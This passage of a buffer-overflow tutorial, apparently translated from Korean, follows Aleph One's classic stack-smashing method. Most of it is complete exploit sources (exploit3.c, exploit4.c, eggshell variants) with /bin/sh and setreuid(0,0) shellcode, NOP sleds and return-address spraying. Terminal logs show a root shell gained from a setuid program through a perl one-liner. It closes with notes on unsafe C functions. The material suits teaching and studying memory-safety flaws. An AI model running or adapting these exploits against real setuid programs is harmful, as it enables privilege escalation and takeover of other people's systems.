IA32          54                   push %esp
IA32          55                   push %ebp
IA32          56                   push %esi
IA32          57                   push %edi
IA32          58                   pop %eax
IA32          59                   pop %ecx
IA32          5a                   pop %edx
IA32          5b                   pop %ebx
IA32          5d                   pop %ebp
IA32          5e                   pop %esi
IA32          5f                   pop %edi
IA32          60                   pusha
IA32          6b c0 00             imul N,%eax
Sprc          81 d                 tn random
IA32          83 e0 00             and N,%eax
IA32          83 c8 00             or N,%eax
IA32          83 e8 00             sub N,%eax
IA32          83 f0 00             xor N,%eax
IA32          83 f8 00             cmp N,%eax
IA32          83 f9 00             cmp N,%ecx
IA32          83 fa 00             cmp N,%edx
IA32          83 fb 00             cmp N,%ebx
IA32          83 c0 00             add N,%eax
IA32          85 c0                test %eax,%eax
IA32          87 d2                xchg %edx,%edx
IA32          87 db                xchg %ebx,%ebx
IA32          87 c9                xchg %ecx,%ecx
Sprc          89 a                 fadds %f20,%f2,%f4
IA32          8c c0                mov %es,%eax
IA32          8c e0                mov %fs,%eax
IA32          8c e8                mov %gs,%eax
IA32          90                   regular NOP
IA32          91                   xchg %eax,%ecx
IA32          92                   xchg %eax,%edx
IA32          93                   xchg %eax,%ebx
HPPA          94 6c e0 84          subi,od 42,%r3,%r12
IA32          95                   xchg %eax,%ebp
IA32          96                   xchg %eax,%esi
Sprc                               sub %o5, 42,%o3
Sprc                               sub %l2,%l2,%o3
IA32          97                   xchg %eax,%edi

IA32          98                   cwtl
Sprc          98 3e                xnor %i2,%l2,%o4
IA32          99                   cltd
IA32          9b                   fwait
IA32          9c                   pushf
IA32          9e                   sahf
IA32          9f                   lahf
Sprc          a0 26 e0 00          sub %i3, 42,%l0
Sprc          a                    add %o5,%l2,%l1
Sprc          a2 0e                and %i2,%l3,%l1
Sprc          a2 1a 40 0a          xor %o1,%o2,%l1
Sprc          a2 1c                xor %l2,%l2,%l1
Sprc          a4 04 e0 00          add %l3, 42,%l2
Sprc          a                    sub %i5,%l2,%l2
Sprc          a4 32 a0 00          orn %o2, 42,%l2
IA32          b0 00                mov N,%eax
Sprc          b                    add %o5, 42,%i1
Sprc          b                    sub %i2,%i1,%i1
HPPA          b5 03 e0 00          addi,od 42,%r8,%r3
HPPA          b5 4b e0 00          addi,od 42,%r10,%r11
Sprc          b a                  add %i1,%i2,%i3
Sprc          b a                  or %i1,%i2,%i3
Sprc          b                    add %l2,%l2,%i3
Sprc          b                    add %o5, 42,%i3
Sprc          ba 56 a0 00          umul %i2, 42,%i5
IA32          c1 c0 00             rol N,%eax
IA32          c1 c8 00             ror N,%eax
IA32          c1 e8 00             shr N,%eax
HPPA          d0 e8 0a e9          shrpw %r8,%r7,8,%r9
IA32          f5                   cmc
IA32          f7 d0                not %eax
IA32          f8                   clc
IA32          f9                   stc
IA32          fc                   cld

From this list we will use the ordinary IA32 NOP, 0x90. Incidentally, the intrusion detection systems (IDS) used for server security these days filter various NOPs in order to block overflow attacks. So even when a program has an overflow vulnerability, an attack that uses the common NOP code may fail. There are ways around this, but they are outside the scope of this document, so filtering is not discussed further. Now let's see how NOPs are used in an overflow attack.

First, fill roughly half of the buffer that will cause the overflow with NOPs. Then place the shellcode in the middle. When writing a real exploit, this of course has to be adjusted to the size of the buffer and the size of the shellcode. After the shellcode come the return addresses. If we are lucky and the return address points anywhere into the run of NOPs, the NOPs execute until the shellcode is reached, and then the shellcode runs. As mentioned briefly above, on the Intel architecture (IA32) the NOP instruction is one byte long, and its machine code is 0x90. Look at the diagram from Aleph One's article.

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
                 ^                     |
                 |_____________________|
top of                                                            bottom of
stack                                                                 stack

In the diagram, N stands for NOP and S for shellcode. The NOPs take up about half of the buffer, and the shellcode fills the rest. As the diagram shows, the return address points into the NOPs. The NOPs execute, and eventually the shellcode runs. Once the shellcode runs, we naturally get a shell. Now let's write the modified exploit3.c, which includes NOPs.

[vangelis@localhost bof]$ vi exploit3.c
#include <stdlib.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);

    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

    /* fill the front half of buff with NOPs, so that buff holds:

       0                     bsize/2-1                       bsize
       [ NOP ][ NOP ]... [ NOP ][ addr ][ addr ]... [ addr ] */
    for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

    /* copy the shellcode into the middle of buff, so that buff holds:

       0                                                           bsize
       [ NOP ][ NOP ]... [ NOP ][ shellcode ][ addr ][ addr ]... [ addr ] */
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    /* write "EGG=" into the first 4 bytes of buff and register buff as an
       environment variable with putenv(). Then start a new /bin/bash with
       system() so that EGG is part of its environment.

       0                                                           bsize
       [ EGG= ][ NOP ]... [ NOP ][ shellcode ][ addr ][ addr ]... [ addr ] */
    memcpy(buff,"EGG=",4);
    putenv(buff);
    system("/bin/bash");
}
~
~
[vangelis@localhost bof]$ gcc -o exploit3 exploit3.c
exploit3.c: In function `main':
exploit3.c:16: warning: return type of `main' is not `int'
[vangelis@localhost bof]$ ./exploit3
Using address: 0xbffff8f8

exploit3 manipulates the environment: it places the NOPs and the shellcode in an environment variable. So after exploit3 has been run, the NOPs and the shellcode are in the environment. Let's check the environment after running exploit3.

[vangelis@localhost bof]$ env
SSH_AGENT_PID=953
HOSTNAME=localhost.localdomain
PVM_RSH=/usr/bin/rsh
TERM=xterm
SHELL=/bin/bash
HISTSIZE=1000
JLESSCHARSET=ko
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc-1.2-gnome2
WINDOWID=
QTDIR=/usr/lib/qt3-gcc3.2
EGG=[a long run of 0x90 NOP bytes, the shellcode bytes ending in /bin/sh, then the repeated return address; the terminal shows all of these as unprintable characters]
USER=vangelis
-- snip --
SSH_AUTH_SOCK=/tmp/ssh-XXXy5zD5/agent.894
PVM_ROOT=/usr/share/pvm3
USERNAME=root
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/894
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
MAIL=/var/spool/mail/root
PWD=/home/vangelis/test/bof
INPUTRC=/etc/inputrc
XMODIFIERS=@im=Ami
LANG=ko_KR.eucKR
GDMSESSION=Default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=5
HOME=/home/vangelis
GNOME_DESKTOP_SESSION_ID=Default

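BASH_ENV=/root/.bashrc
LOGNAME=vangelis
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0
G_BROKEN_FILENAMES=1
XAUTHORITY=/home/vangelis/.xauthvFuoQk
COLORTERM=gnome-terminal
_=/bin/env
[vangelis@localhost bof]$

In the output above, the EGG entry is where the NOPs and the shellcode have been placed in the environment. In the terminal it looks like blank space, but it is not; viewed in a text editor, some of the machine code is mangled, but values such as F 0080 can be seen. I checked this with gedit, an application included in Red Hat Linux.

Now for the attack itself. The buffer size passed as an argument (bsize in the source) must be chosen carefully: a good choice is about 100 bytes more than the size of the buffer we want to overflow. This places the shellcode at the end of that buffer while leaving plenty of room for NOPs, and the return address is still overwritten with the guessed address. The address is still a guess, but thanks to the NOPs the chance of success is higher. The buffer in vulnerable.c, the program we are attacking, is 512 bytes, so using 612 bytes should give a good success rate. I ran the attack in a way that suits my own system. The results follow.

[vangelis@localhost bof]$ ./exploit3 532
Using address: 0xbffff6f8
[vangelis@localhost bof]$ ./vulnerable $EGG
Segmentation fault
[vangelis@localhost bof]$ exit
exit
[vangelis@localhost bof]$ ./exploit3 533
Using address: 0xbffff6f8
[vangelis@localhost bof]$ ./vulnerable $EGG
sh-2.05b$
-- snip --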

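[vangelis@localhost bof]$ ./exploit3 614
Using address: 0xbffff6f8
[vangelis@localhost bof]$ ./vulnerable $EGG
sh-2.05b$
[vangelis@localhost bof]$ ./exploit3 615
Using address: 0xbffff6f8
[vangelis@localhost bof]$ ./vulnerable $EGG
Segmentation fault

The original article uses 612 bytes, but I checked the whole usable range. The results on my system show about 81 sizes, 612 bytes among them, at which the attack succeeds.

Next, Aleph One gives a real attack example based on an Xt library buffer overflow that had been published at the time he wrote his article. That problem has since been fixed, and reproducing the same conditions on my system for testing would be cumbersome, so I skip it and move on to the next section.

Small Buffer Overflows

This section covers attacking an overflow vulnerability with what is commonly known as an eggshell. Sometimes a program has an overflow vulnerability, but the allocated buffer is too small to hold the shellcode, so the shellcode cannot be used in it. In that case the methods seen so far no longer work. Either the buffer is so small that the shellcode does not fit and the return address is overwritten with instructions such as NOPs instead of the address of our code, or the number of NOPs that can be placed at the front of the string is so small that the chance of guessing the return address drops sharply. To obtain a shell from the vulnerable program in such cases, a different method is needed.

This method works only when we have access to the program's environment variables; in other words, it is an attack through the environment. Concretely, the shellcode is first placed in an environment variable. The buffer is then overflowed with the address of that environment variable in memory. This method also improves the chance of success, because the environment variable holding the shellcode can be made as large as we like. Environment variables are stored at the top of the stack when the program starts, and anything later changed with setenv() is allocated elsewhere in memory. At startup the stack looks like this:

<strings><argv pointers>NULL<envp pointers>NULL<argc><envp>

Now let's attack the vulnerable program with exploit4.c, which applies what has just been described. We first attack vulnerable.c, and then modify the source of vulnerable.c to carry out a small buffer overflow attack in the literal sense.

[vangelis@localhost bof]$ vi exploit4.c
#include <stdlib.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
}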

int main(int argc, char *argv[]) {
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i, eggsize=DEFAULT_EGG_SIZE;

    /* if the user supplied values, use them for the buffer size, the
       offset and the egg size */
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);

    /* allocate memory for buff; exit on failure */
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* allocate memory for egg; exit on failure */
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* addr, the value that will overwrite the return address, is set to
       the current stack pointer minus offset. addr is used as the guessed
       start address of the environment variable EGG that holds the
       eggshell. It is hard to predict exactly, so the offset has to be
       varied by trial and error. */
    addr = get_esp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* make ptr equal to buff, and point addr_ptr at the start of ptr,
       that is, the start of buff */
    ptr = buff;
    addr_ptr = (long *) ptr;

    /* fill bsize bytes through addr_ptr with the guessed start address
       (addr), so that buff holds:

       0                                           bsize
       [ addr ][ addr ][ addr ]... [ addr ] */
    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

    /* make ptr equal to egg */
    ptr = egg;

    /* fill egg with NOPs up to eggsize minus the size of the shellcode,
       so that egg holds:

       0                                                     eggsize
       [ NOP ][ NOP ][ NOP ]... [ NOP ][ NOP ][ garbage ] */
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;

    /* copy the shellcode into the [ garbage ] part of egg, so that egg
       holds:

       0                                                     eggsize
       [ NOP ][ NOP ][ NOP ]... [ NOP ][ NOP ][ shellcode ] */
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* terminate the strings */

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    /* write "EGG=" into the first 4 bytes of egg and "RET=" into the
       first 4 bytes of buff, then register both as environment variables
       with putenv(). Then start a new /bin/bash with system() so that EGG
       and RET are part of its environment.

       -=[ egg ]=-
       0                                                     eggsize
       [ EGG= ][ NOP ][ NOP ]... [ NOP ][ NOP ][ shellcode ]

       -=[ buff ]=-
       0                                           bsize
       [ RET= ][ addr ][ addr ]... [ addr ] */
    memcpy(egg,"EGG=",4);
    putenv(egg);
    memcpy(buff,"RET=",4);
    putenv(buff);
    system("/bin/bash");
}
~
~
[vangelis@localhost bof]$ gcc -o exploit4 exploit4.c
exploit4.c: In function `main':
exploit4.c:19: warning: return type of `main' is not `int'
[vangelis@localhost bof]$ ./exploit
Using address: 0xbfffedf8
[vangelis@localhost bof]$ ./vulnerable $RET
Segmentation fault
[vangelis@localhost bof]$ ./exploit
Using address: 0xbfffedf8
[vangelis@localhost bof]$ ./vulnerable $RET
sh-2.05b$
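Every attack in this section depends on the unchecked strcpy(buffer, argv[1]) call in vulnerable.c. For contrast, here is a minimal sketch of a bounded copy, assuming a C99 library with snprintf(); the function name copy_bounded is hypothetical and does not appear in the original article.

```c
#include <stdio.h>
#include <string.h>

/* Copy src into dst, which has room for dst_size bytes including the
 * terminating '\0'. Unlike strcpy(), never writes past dst_size bytes.
 * Returns 1 if the whole string fit, 0 if it had to be truncated.
 * (Hypothetical helper for illustration only.) */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    /* snprintf() reports how many characters the full string needs,
     * which lets the caller detect truncation. */
    int needed = snprintf(dst, dst_size, "%s", src);

    return needed >= 0 && (size_t)needed < dst_size;
}
```

With a call such as copy_bounded(buffer, sizeof buffer, argv[1]), an oversized argument is cut off at the end of buffer instead of running on over the saved frame pointer and the return address, and the return value tells the caller that the input was too long.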

Now let's modify the source of vulnerable.c as follows and attack it.

newvulnerable.c
void main(int argc, char *argv[]) {
    char buffer[30];

    if (argc > 1)
        strcpy(buffer, argv[1]);
}

[vangelis@localhost bof]$ gcc -o newvulnerable newvulnerable.c
newvulnerable.c: In function `main':
newvulnerable.c:1: warning: return type of `main' is not `int'
[vangelis@localhost bof]$ ./exploit
Using address: 0xbfffebe8
[vangelis@localhost bof]$ ./newvulnerable $RET
Segmentation fault
[vangelis@localhost bof]$ ./exploit
Using address: 0xbfffebe8
[vangelis@localhost bof]$ ./newvulnerable $RET
sh-2.05b$

These results show how much easier the attack becomes when the environment is used. Now let's check whether running exploit4 really places the shellcode and NOPs in the environment entry EGG.

[vangelis@localhost bof]$ env
SSH_AGENT_PID=870
HOSTNAME=localhost.localdomain
PVM_RSH=/usr/bin/rsh
TERM=xterm
SHELL=/bin/bash
HISTSIZE=1000
JLESSCHARSET=ko

GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc-1.2-gnome2
WINDOWID=
QTDIR=/usr/lib/qt3-gcc3.2
EGG=[a very long run of 0x90 NOP bytes followed by the shellcode bytes ending in /bin/sh; the terminal shows these as unprintable characters]
USER=vangelis
-- snip --
SSH_AUTH_SOCK=/tmp/ssh-XXfrUrwx/agent.811
PVM_ROOT=/usr/share/pvm3
USERNAME=root

    SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/811
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
    MAIL=/var/spool/mail/root
    PWD=/home/vangelis/test/bof
    INPUTRC=/etc/inputrc
    LANG=ko_KR.eucKR
    GDMSESSION=Default
    SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
    SHLVL=5
    HOME=/home/vangelis
    GNOME_DESKTOP_SESSION_ID=Default
    BASH_ENV=/root/.bashrc
    LOGNAME=vangelis
    LESSOPEN= /usr/bin/lesspipe.sh %s
    DISPLAY=:0
    RET=[the return address repeated many times, shown by the terminal as "?" characters]
    G_BROKEN_FILENAMES=1
    XAUTHORITY=/home/vangelis/.xauthSyyvp7
    COLORTERM=gnome-terminal
    _=/bin/env
    [vangelis@localhost bof]$

Look at the EGG entry in the output above (set in bold in the original). As mentioned earlier, on the terminal it looks like blank space, but it is not blank: opened in a text editor, some of the machine code is garbled, yet characters such as F and B can be seen.

In Aleph One's original paper, a separate source file named eggshell.c appears in Appendix B at the end. In Korea, however, it is exploit4.c that most people call "eggshell". This is probably because exploit4.c also places the shellcode in the environment variable EGG, and because it is the more convenient of the two to use. For convenience I will also call exploit4.c eggshell, and I see no need to tie the name to one particular source file. The name simply combines EGG, the environment variable, with the shell that the shellcode stored in it executes. If the environment variable EGG in exploit4.c were renamed MINI, one could just as well call the program "minishell".

Moreover, more than one kind of program can play the role of an eggshell. The following is another eggshell used in attacks; for fun, I named it minishell.c.

minishell.c

    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  /* NOP */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"  /* setreuid(0, 0); */
        "\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73"  /* execve("/bin/bash", NULL) */
        "\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
        "\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
        "\x31\xc0\xb0\x01\xcd\x80";                 /* exit(0); */

    int main(void)
    {
        /* "MINI=" is five bytes; copying only four would drop the '='
           and putenv() would not define the variable. */
        memcpy(shellcode, "MINI=", 5);
        putenv(shellcode);
        system("/bin/sh");
        return 0;
    }

get_eg_addr.c

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        /* Variable names are case-sensitive, so the name must match MINI exactly. */
        printf("egg address: %p\n", (void *)getenv("MINI"));
        return 0;
    }

Aleph One's original paper goes on to use eggshell against vulnerabilities that were current when the paper was published, but I see no need to cover them here. The paper briefly shows how to add an entry to the environment and how the attack proceeds; I have already explained why the vulnerabilities of that period need no discussion and how to add an environment variable. Instead, I will close this section with two topics: a simple problem that arises when attacking an overflow-vulnerable program with eggshell, and a short introduction to perl, which is used frequently in overflow attacks and in system hacking generally.

A question I am asked from time to time is this: the vulnerable program is owned by root and the attack appears to succeed, yet no root shell is obtained. In most cases the cause is the shellcode used in eggshell.c. Several different shellcodes are used with eggshell.c. Early eggshells used the shellcode written by Aleph One, and with it no root shell was executed even though the vulnerable program was owned by root. To obtain a root shell, code that produces a root shell must therefore be included. Let us change the owner of the vulnerable program built from vulnerable.c to root and attack it, first with Aleph One's shellcode unchanged and then with setreuid(0, 0) code added. From here on we will also use perl in the attack.

    [vangelis@localhost bof]$ vi eggshell.c

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    #define DEFAULT_OFFSET        0
    #define DEFAULT_BUFFER_SIZE   512
    #define DEFAULT_EGG_SIZE      2048
    #define NOP                   0x90

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* Return the current stack pointer (the value is left in %eax). */
    unsigned long get_esp(void) {
        __asm__("movl %esp,%eax");
    }

    int main(int argc, char *argv[]) {
        char *buff, *ptr, *egg;
        long *addr_ptr, addr;
        int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
        int i, eggsize = DEFAULT_EGG_SIZE;

        if (argc > 1) bsize   = atoi(argv[1]);
        if (argc > 2) offset  = atoi(argv[2]);
        if (argc > 3) eggsize = atoi(argv[3]);

        if (!(buff = malloc(bsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }
        if (!(egg = malloc(eggsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }

        addr = get_esp() - offset;
        printf("Using address: 0x%lx\n", addr);

        /* Fill buff with the guessed address. */
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i += 4)
            *(addr_ptr++) = addr;

        /* Fill egg with NOPs, then append the shellcode. */
        ptr = egg;
        for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
            *(ptr++) = NOP;

        for (i = 0; i < strlen(shellcode); i++)
            *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';

        memcpy(egg, "EGG=", 4);
        putenv(egg);
        memcpy(buff, "RET=", 4);
        putenv(buff);
        system("/bin/bash");
        return 0;
    }

    [vangelis@localhost bof]$ gcc -o eggshell eggshell.c
    [vangelis@localhost bof]$ su
    Password:
    [vangelis@localhost bof]# chmod 4777 vulnerable
    [vangelis@localhost bof]# chown root vulnerable
    [vangelis@localhost bof]# chgrp root vulnerable
    [vangelis@localhost bof]# ls -al
    -rwsrwxrwx 1 root root 월 15 00:10 vulnerable
    [vangelis@localhost bof]# su vangelis
    [vangelis@localhost bof]$ ./eggshell
    Using address: 0xbffff8f8
    [vangelis@localhost bof]$ ./vulnerable `perl -e 'print "\xf8\xf8\xff\xbf"x132'`
    sh-2.05b$ id
    uid=500(vangelis) gid=500(vangelis) groups=500(vangelis)

The result above shows that a shell was executed, but not a root shell, even though both the owner and the group of the program are root. Now let us modify the shellcode used in eggshell.

    [vangelis@localhost bof]$ vi eggshell2.c

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    #define DEFAULT_OFFSET        0
    #define DEFAULT_BUFFER_SIZE   512
    #define DEFAULT_EGG_SIZE      2048
    #define NOP                   0x90

    char shellcode[] =
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"  /* setreuid(0, 0); */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* Return the current stack pointer (the value is left in %eax). */
    unsigned long get_esp(void) {
        __asm__("movl %esp,%eax");
    }

    int main(int argc, char *argv[]) {
        char *buff, *ptr, *egg;
        long *addr_ptr, addr;
        int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
        int i, eggsize = DEFAULT_EGG_SIZE;

        if (argc > 1) bsize   = atoi(argv[1]);
        if (argc > 2) offset  = atoi(argv[2]);
        if (argc > 3) eggsize = atoi(argv[3]);

        if (!(buff = malloc(bsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }
        if (!(egg = malloc(eggsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }

        addr = get_esp() - offset;
        printf("Using address: 0x%lx\n", addr);

        /* Fill buff with the guessed address. */
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i += 4)
            *(addr_ptr++) = addr;

        /* Fill egg with NOPs, then append the shellcode. */
        ptr = egg;
        for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
            *(ptr++) = NOP;

        for (i = 0; i < strlen(shellcode); i++)
            *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';

        memcpy(egg, "EGG=", 4);
        putenv(egg);
        memcpy(buff, "RET=", 4);
        putenv(buff);
        system("/bin/bash");
        return 0;
    }

    [vangelis@localhost bof]$ gcc -o eggshell2 eggshell2.c
    [vangelis@localhost bof]$ ./eggshell2
    Using address: 0xbffff8f8
    [vangelis@localhost bof]$ ./vulnerable `perl -e 'print "\xf8\xf8\xff\xbf"x132'`
    sh-2.05b#
    sh-2.05b# id
    uid=0(root) gid=500(vangelis) groups=500(vangelis)
    sh-2.05b# whoami
    root
    sh-2.05b#

At last a root shell appears. Adding the setreuid(0, 0) shellcode was all it took to obtain root privileges. Finally, let us take a brief look at how to use perl [24]. Its usage can be displayed by running perl -h at the prompt.

[24] A great deal of perl material is available online, including material that beginners can follow fairly easily (the URLs given in the original footnote were not preserved).

    [vangelis@localhost bof]$ perl -h

    Usage: perl [switches] [--] [programfile] [arguments]
      -0[octal]       specify record separator (\0, if no argument)
      -a              autosplit mode with -n or -p (splits $_ into @F)
      -C              enable native wide character system interfaces
      -c              check syntax only (runs BEGIN and CHECK blocks)
      -d[:debugger]   run program under debugger
      -D[number/list] set debugging flags (argument is a bit mask or alphabets)
      -e 'command'    one line of program (several -e's allowed, omit programfile)
      -F/pattern/     split() pattern for -a switch (//'s are optional)
      -i[extension]   edit <> files in place (makes backup if extension supplied)
      -Idirectory     specify @INC/#include directory (several -I's allowed)
      -l[octal]       enable line ending processing, specifies line terminator
      -[mM][-]module  execute `use/no module...' before executing program
      -n              assume 'while (<>) { ... }' loop around program
      -p              assume loop like -n but print line also, like sed
      -P              run program through C preprocessor before compilation
      -s              enable rudimentary parsing for switches after programfile
      -S              look for programfile using PATH environment variable
      -T              enable tainting checks

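      -u              dump core after parsing program
      -U              allow unsafe operations
      -v              print version, subversion (includes VERY IMPORTANT perl info)
      -V[:variable]   print configuration summary (or a single Config.pm variable)
      -w              enable many useful warnings (RECOMMENDED)
      -W              enable all warnings
      -X              disable all warnings
      -x[directory]   strip off text before #!perl line and perhaps cd to directory
    [vangelis@localhost bof]$

Consider the following part of the attack above.

    [vangelis@localhost bof]$ ./vulnerable `perl -e 'print "\xf8\xf8\xff\xbf"x132'`

First, note the ` character in front of perl. This is not a single quotation mark (') but a backquote, also called a back quotation mark. On your keyboard it shares a key with the ~ character. The vulnerable program accepts an argument at run time (void main(int argc, char *argv[])), and here that argument is supplied by a perl script: the shell runs the command enclosed in the backquotes and substitutes its output as the argument. The structure is as follows.

    $ ./program `perl -e '...'`

The -e switch after perl tells it to execute the command that follows. That command is enclosed in single quotation marks ('), and when, as below, print is to output a string such as wowhacker, the string is enclosed in double quotation marks (").

    $ perl -e 'print "wowhacker!\n"'
    wowhacker!

Now let us summarize the part of the attack shown earlier.

    [vangelis@localhost bof]$ ./vulnerable `perl -e 'print "\xf8\xf8\xff\xbf"x132'`

The program vulnerable, which has an overflow vulnerability, is run and takes its argument from the perl script placed between the opening and closing backquotes. The perl command prints the address of the environment variable EGG, which holds the shellcode and the NOP codes and was reported when eggshell was run; the x132 operator repeats those four address bytes 132 times. Passing this output to the program results in a shell.

Finding Buffer Overflows

This section describes how to find programs that have buffer overflow vulnerabilities. It is mostly a brief introduction to functions that perform no bounds checking; readers will best appreciate the problems with each function by running into them while writing C code themselves. I will limit myself to adding brief explanations to Aleph One's text.

As we have seen, a buffer overflow occurs when more data is put into a buffer than it was allocated to hold. Some functions in the C library perform no bounds checking. Among the string-handling functions, strcat(), strcpy(), sprintf(), and vsprintf() are the typical ones whose lack of bounds checking can lead to an overflow. These functions keep copying until they meet a null character, without checking any bound. If they appear in source code that uses the form void main(int argc, char *argv[]), the code deserves a careful look.

Another dangerous function is gets(). It reads a line from standard input (stdin) until a newline (\n) or EOF, and it too performs no bounds checking. Anyone who has compiled source containing gets() with gcc on Linux will have seen a warning such as: the `gets' function is dangerous and should not be used.

The scanf() family of functions can also be a problem when matching a sequence of non-white-space characters (%s) or a non-empty sequence of characters from a specified set (%[]). That is, using these functions to store data in a string without checking its maximum length causes an overflow. For reference, white-space characters are those used to separate tokens; the common ones are the space, the tab, and the newline. The problem arises when the array pointed to by the char pointer is not large enough to hold the whole sequence of characters and no maximum field width has been specified. If the target of any of the functions mentioned above is a buffer of fixed size, and the other argument is derived from user input, there is a good chance that the overflow can be exploited.

Another programming construct in which buffer overflows can be found is a while() loop that reads one character at a time into a buffer, from a file or from standard input, until the end of the line, the end of the file, or some other delimiter is reached. A delimiter is a character that marks the beginning and end of a string and is not itself part of the string; in commands, the space, the backslash (\), and the forward slash (/) commonly serve as delimiters. Constructs of this type use getc(), fgetc(), or getchar(). If the while loop lacks a proper check, an overflow attack becomes possible.

Chapter 6, "Avoid Buffer Overflow" [26], of David A. Wheeler's Secure Programming for Linux and Unix HOWTO [25] is a helpful reference for this section.

Finally, in his conclusion Aleph One notes that grep, used well, can find programs with overflow vulnerabilities. grep is a program that prints the lines matching a given pattern. For details on its use, see the Linux man page.

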